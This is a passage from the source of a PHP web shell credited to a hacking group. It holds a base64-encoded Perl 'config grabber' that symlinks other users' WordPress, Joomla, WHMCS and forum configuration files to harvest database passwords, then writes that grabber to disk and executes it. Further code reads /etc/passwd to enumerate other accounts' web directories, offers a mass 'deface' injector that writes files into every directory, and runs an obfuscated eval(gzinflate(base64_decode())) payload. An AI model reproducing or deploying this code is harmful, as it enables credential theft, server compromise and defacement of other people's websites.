cHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xhLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWd1cmUucGhwJywka29sYS4nLTEwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2luYy5waHAnLCRrb2xhLictMTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9XUC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV1AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1wcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLXdwLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Byb3RhbC93cC1jb25maWcucGhwJywka29sYS4nLXdwLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3Atc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYWluL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC90ZXN0L3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLictNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJy03LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nLTgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLictOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLictMTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW1haW4udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmI0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictaW5jbHVkZXMtdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLWNlbnRyYWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vV0hNQ1MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWMtV0hNLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHAudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1Ym1pdHRpY2tldC5waHAnLCRrb2xhLictd2htY3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGVzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudGVzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50c3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL215c2hvcC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXlzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLVpDc2hvcC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictc21mLWZvcnVtLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bXMvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC91cC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwMi50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9ImJsYWNrIj4NCjxwPkdyZWF0IFRvIENEQyB8IEN5YjNyU2VjIHwgRG90TXkgfCBEZXZpbHpTZWMgfDwvcD4NCjxiciAvPjxmb3JtIG1ldGhvZD0icG9zdCI+PHN0cm9uZz4NCjx0ZXh0YXJlYSBpZD0iY2hlY2tvdXR0ZXh0YXJlYSIgbmFtZT0icGFzcyIgc3R5bGU9ImJvcmRlcjoxcHggc29saWQgIzRDODNBRjsgd2lkdGg6ICA0OThweDsgaGVpZ2h0OiAzNzBweDsgYmFja2dyb3VuZC1jb2xvcjojMTExMTExOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZTo5cHQ7IGNvbG9yOiB3aGl0ZSIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjFweCBzb2xpZCAjNEM4M0FGOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzExMTExMTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjp3aGl0ZTsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNvbmZpZyBDaGVjayIgc3R5bGU9ImJvcmRlcjoxcHggc29saWQgIzRDODNBRjsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogd2hpdGU7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiMxMTExMTE7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9IkJsYWNrIj4NCjxoMj5TdWNjZXNzZnVsbCBDaGVja2VyICE8L2gyPg0KPGlmcmFtZSBzcmM9Y29uZmlnd2ViLyB3aWR0aD0xMDAlIGhlaWdodD02MjBweCBmcmFtZWJvcmRlcj0wPjwvaWZyYW1lPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250PjwvYT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==';
  989. $config1 = fopen('config.Dz','w+');
  990. $cofig2 = fwrite($config1 ,base64_decode($config));
  991. fclose($config1);
  992. chmod('config.Dz',0755);
  993. echo '<iframe src=web_/config.Dz width=100% height=620px frameborder=0></iframe> ';;
  994. }
  995. if (isset($_POST['5']))
  996. {
  997. ($sm = ini_get('safe_mode') == 0) ?$sm = 'off': die('<b>Error: safe_mode = on</b>');
  998. set_time_limit(0);
  999. @$passwd = fopen('/etc/passwd','r');
  1000. if (!$passwd) {die("<center><pre style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>");}
  1001. $pub = array();
  1002. $users = array();
  1003. $conf = array();
  1004. $i = 0;
  1005. while(!feof($passwd))
  1006. {
  1007. $str = fgets($passwd);
  1008. if ($i >35)
  1009. {
  1010. $pos = strpos($str,':');
  1011. $username = substr($str,0,$pos);
  1012. $dirz = '/home/'.$username.'/public_html/';
  1013. if (($username != ''))
  1014. {
  1015. if (is_readable($dirz))
  1016. {
  1017. array_push($users,$username);
  1018. array_push($pub,$dirz);
  1019. }
  1020. }
  1021. }
  1022. $i++;
  1023. }
  1024. echo '<br><br><textarea class="output" >';
  1025. echo '[+] Founded '.sizeof($users)." entrys in /etc/passwd\n";
  1026. echo '[+] Founded '.sizeof($pub)." readable public_html directories\n";
  1027. echo "[~] Searching for passwords in config files...\n\n";
  1028. foreach ($users as $user)
  1029. {
  1030. $path = "/home/$user/public_html/";
  1031. echo "$path \n";
  1032. }
  1033. echo "\n";
  1034. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n";
  1035. echo "[+] Complete...\n";
  1036. echo '</textarea><br><br></b>
  1037. </body>
  1038. </html>';
  1039. }
  1040. }
  1041. elseif(isset($_GET['x']) &&($_GET['x'] == 'Code'))
  1042. {
  1043. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=Code" method="post">
  1044. ';
  1045. echo '<table class="tabnet" style="width:320px;padding:0 1px;">';
  1046. echo '<tr><th colspan="2"><center><h1>Code injector By DevilzSec Team</h1><div class=content></tr>';
  1047. echo '<td colspan="2"><p style="text-align:center;"><form ENCTYPE="multipart/form-data" action='.$_SERVER['PHP_SELF'].' " method=post>';
  1048. echo 'Direction Name <br><input class=inputz type=text name=path size=60 value='.$pwd.'><br>';
  1049. echo 'File Name <br><input class=inputz type=text name=file size=60 value="Dz.html"><br>';
  1050. echo 'Source Deface<br><input class=inputz type=text name=url size=60 value="<a>By D4rkDriv3r DevilzSec<a>"><br>';
  1051. echo '<input type=submit class=inputzbut value=Deface></p></form><html></td></p>';
  1052. $mainpath=$_POST[path];
  1053. $file=$_POST[file];
  1054. $$txtContents=$_POST[url];
  1055. echo '
  1056. <tr><th colspan="5"><center><h1>Attack !!</h1></th>';
  1057. $dir=opendir("$mainpath");
  1058. while($row=readdir($dir))
  1059. {
  1060. $start=@fopen("$row/$file",'w+');
  1061. $code=$$txtContents;
  1062. $finish=@fwrite($start,$code);
  1063. if ($finish)
  1064. {
  1065. echo "<tr><td><div><strong>$row/$file</strong><span style='color:red;'> Was Inject</span></td></tr>";
  1066. }
  1067. }
  1068. }
  1069. elseif(isset($_GET['x']) &&($_GET['x'] == 'about'))
  1070. {
  1071. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=about" method="post">
  1072. ';
  1073. echo 'COming Soon,INsyallah';
  1074. }
  1075. elseif(isset($_GET['x']) &&($_GET['x'] == 'php'))
  1076. {
  1077. ;echo '
  1078. <form action="?y=';echo $pwd;;echo '&amp;x=php" method="post">
  1079. <table class="cmdbox">
  1080. <tr>
  1081. <td>
  1082. <textarea class="output" name="cmd" id="cmd">';eval(gzinflate(base64_decode('FZfHsoPYFUV/xbNuFwNyKtvdRc45M3GRcxBJwNdb1uhVSUg87jl7r/X3X//++x/VlY1/Nm8312N2VH/ux/bfbTlg9M882ysC+29ZFUtZ/fmHmK4BT9ofMfHBEJlwwTkO96MWUH6tGWu739qt6hmlcqsQ2Y2G3v1L7RcIkCgIgKO7rxdc0+VpeSp44iGYXxfezdGQgN6RHLjOgMMnAIIqqEFYioIZr4DXjZu6kaVHzEh6rSxLqDcP8gixjF0msxYFYk9pZV6ZVTDcgS0sOhSjcRQhBHR/qkohI/0BwdokHYPIufFv0JZqLlJGPpZqwzDbMZ+Y3I8slQK8OclaE1hv6yh2DoE8tPn2kxJw7jAvDNtFgKPA5/5cx0SMRHsIp7Ai2FBXsFLQ9A3rW5LNOMQk2lPU+DpmM6XIJPOcEvWshHvX9WNb7mMdafviD2JBvNMJw5pwk2Xt/lfCMNJHjuDGH/l0ElWirAoLr9wMnrqf95z2lCOXgn6F0CT2/fvAt9ujZKgXDpla9JqbBoJ47vh4K/82PlC/EvTq2Bf2kO8smhaXzxs2yzwPJKI/QBabEoKyrL/3nJrXdNR/WErpv8V9AJr9mLtLELthbznczWg8XhUG88/qQ1HofQz2xWrFN26qbKrYNh2T+BK7qo5Z19wIH9sTY1I5jhbuJfaZGXUiyKKhUwyaus1xUFlZBpetenLKMRQcnfc8z9vKM4hpxuKYc3ci7nCIW9fpobdQJMNGx+rysJfniz3qlfghUTgtPOBISldYNtDzN8BnFtXS4E1Olv79ynmCKPl010HE+JwYi7nvE03Qo3Mt/KaWY1bUdgtMjUpgycdXC8prQ/pjkqhApIKjypJ4NTPdrFVNAtf27JwnFJUPuQHOaP1mFNge1g2oiEmyxGe1BEMxZTypful5XeGoYmKB5QtJE+aOZcSlfM3VCHhOvfd+2HGdUoDFM9Zypu1GiOw1R68CtEvzUVIp4KKCR3Vof8y+S1ZXxVY/FnFmpbTg1PoOPIazSyvZ30FkDg+DvEgwa7O3tB5PNDxeipzuw2jFJchbTIa4Hs6bXfvjlYZhoTstMkb1uRsz58WWMWjRFyIcmRsT4KxKCG0QYEXFkCYqGmpcJ3wG+z4Yy9kYVg+VyzIjsvI3CnQ2mJVQPGEYC/Cy3vFjRAoID4XuWvyUY6l8fbB1S9eKDdXOUBJtAvySHDg2aZI6Z/4MkVXTt20UqnALPgwPq7z3FRl5d2+doBimSEVD5dAduiqpJIvv1SSSTxzmgtUJiRiHMD2FJJv0J7lF5bmIqNmS33EuA6IH+xDMECpfmf49vKN9VWmdXSvkXYTwH10hozClHHPnon1CAem89NE4aEv6muTv5yU6njOkwumrbUwIQ5NJTOVfVARUjmB5OsNH5w3e6O2V94G4yYcDR5dyvleoPKb6rYPsER22ZvhITyPG/SjWx9aZIBJAjMBsuyRCYH1YXEX7DC0Y/GR4QGzKhY8CqFPbWFgNIvJWQq/UufLtwnlu/C/FcgCRcxX5QjVXmwwyl1pnPZk0NXgOc+hIltExRWQS4tbFZChmEB/YrHs78PkPBLIJzWEnUcZgEbkYWdfYWgo6qFNnuhAnS/YLlgGP6xnhv